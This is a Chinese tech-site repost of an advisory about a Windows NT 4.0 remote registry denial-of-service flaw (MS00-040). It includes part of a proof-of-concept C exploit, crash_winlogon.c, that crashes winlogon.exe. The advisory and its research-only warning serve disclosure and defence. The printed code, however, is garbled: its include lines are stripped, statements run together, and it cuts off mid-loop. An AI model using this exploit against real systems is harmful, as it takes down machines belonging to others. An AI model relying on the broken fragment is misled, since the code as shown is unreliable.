繁体中文
设为首页
加入收藏
当前位置:技术首页 >> 安全 >> 系统和数据 >> WindowsNT4.0远程注册表拒绝服务攻击

WindowsNT4.0远程注册表拒绝服务攻击

2008-04-07 23:14:06  作者:IT动力源  来源:IT动力源收集整理  浏览次数:0  文字大小:【】【】【

  59、Windows NT 4.0 远程注册表拒绝服务攻击漏洞 

  Windows NT 4.0 远程注册表拒绝服务攻击漏洞发布日期:

  受影响的系统: - Microsoft Windows NT 4.0 Workstation-

  Microsoft Windows NT 4.0 Server- Microsoft Windows NT 4.0 Server, Enterprise Edition- Microsoft Windows NT 4.0 Server,

  Terminal Server Edition

  不受影响系统: Windows 2000

  描述: 在远程主机对注册表的访问请求被处理前,需要先经由远程注册表server进行认证。如果提交一个错误格式的请求,会让远程注册表server错误得进行解释,并发生错误,不能正常工作。

  在Windows Nt 4.0中,由于注册表server包含在winlogon.exe这一系统进程里,这个进程出错将导致整个系统不可用。注意,只有一个已经通过

  认证的用户才能发起这样的请求,匿名(空会话)连接不能导致这种拒绝服务攻击。受到攻击的系统必须重新启动才能正常工作。<* 来源:

  Renaud Deraison from Nessus Team Microsoft Security Bulletin (MS00-040)*>

  测试程序: 警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! /** crash_winlogon.c**

  by Renaud Deraison - deraison@cvs.nessus.org** This code is released under the GNU General Public License.*

  (thanks for respecting this license)** In case you are wondering, here is the motto I applied for this code :**

  "Structures are for sissies"*/#include #include #ifdef WIN32#include #define bzero(x,y) memset(x, 0, y)#else#include #include

  #include #include #define closesocket(x) close(x)#endifchar * netbios_name(char * orig){int I, len;char * ret =

  malloc(40);bzero(ret, 40);len =

  strlen(orig);for(I=0;I<16;I++){ if(I >= len) strcat(ret, "CA"); else { int odiv, omod; odiv = (orig[I] / 16) + 'A'; omod =

  (orig[I] % 16) + 'A'; ret[strlen(ret)]=odiv;

  ret[strlen(ret)]=omod; }}return(ret);}char *

  netbios_redirector(){int I;char * ret =

  malloc(31);bzero(ret, 31);for(I=0;I<15;I++)strcat(ret, "CA");strcat(ret, "AA");return(ret);}char* unicode(char *

  data){int len = strlen(data);int I;char * ret =

  malloc(110);int l = 0;bzero(ret,110);for(I=0;I


点击收藏到

责任编辑:fwr

本文引用地址: http://tech.itzero.com/2008/0407/30160.html 请粘贴到你的QQ/MSN上推荐给你的好友

相关文章
Windows Server 2008曝严重漏洞 影响Vista系统安全
GSM标准有安全漏洞致隐私数据泄露
Windows下PHP的任意文件执行漏洞
躲开Windows XP 系统的共享漏洞
专家发现Windows系统Wi-Fi功能漏洞
Windows和Office存在五个安全漏洞
Windows系统中角色扮演权限提升的漏洞
Windows远程内核漏洞注入(1)
Windows远程内核漏洞注入(2)
Windows远程内核漏洞注入(3)
 

最新文章

更多

· 通过修改注册表来增强系...
· 5个步骤增强活动目录的安全
· 小心驶得万年船Vista真的...
· 三招技巧防止USB接口泄漏...
· IE无法打开网页的常见原...
· 有备无患 畅游网络的十大...
· 手把手教你防盗号
· 卡巴斯基杀毒软件的十九...
· 暴力破解HTTP验证检测页...
· 设置sql server实现互联...

热点文章

更多

· IE无法打开网页的常见原...
· 卡巴斯基杀毒软件的十九...
· 三招技巧防止USB接口泄漏...
· 手把手教你防盗号
· 有备无患 畅游网络的十大...
· 黑客逐渐将Windows Vist...
· 修改SQL Server 2000身份...
· 暴力破解HTTP验证检测页...
· 5个步骤增强活动目录的安全
· 通过修改注册表来增强系...

其它推荐